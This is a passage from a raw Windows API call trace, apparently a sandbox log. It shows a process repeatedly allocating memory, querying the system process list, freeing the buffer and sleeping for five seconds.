(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0220.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.856] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0220.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0221.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.008] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0221.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0221.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.154] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0221.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0221.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.264] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0221.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0221.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.392] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0221.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0221.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.500] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0221.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0221.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.607] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0221.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0221.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.719] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0221.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0221.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.880] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0221.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0222.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.529] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0222.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0222.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0222.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0222.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0222.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0222.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.704] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0222.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0222.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0222.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0222.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0222.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0222.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.879] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0222.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0222.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0222.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0222.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0222.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0223.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.089] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0223.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0223.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.203] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0223.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0223.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.316] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0223.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0223.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.463] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0223.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0223.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.599] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0223.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0223.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.717] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0223.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0223.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.883] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0223.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0224.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.046] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0224.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0224.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.271] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.273] NtAllocateVirtualMemory (in: 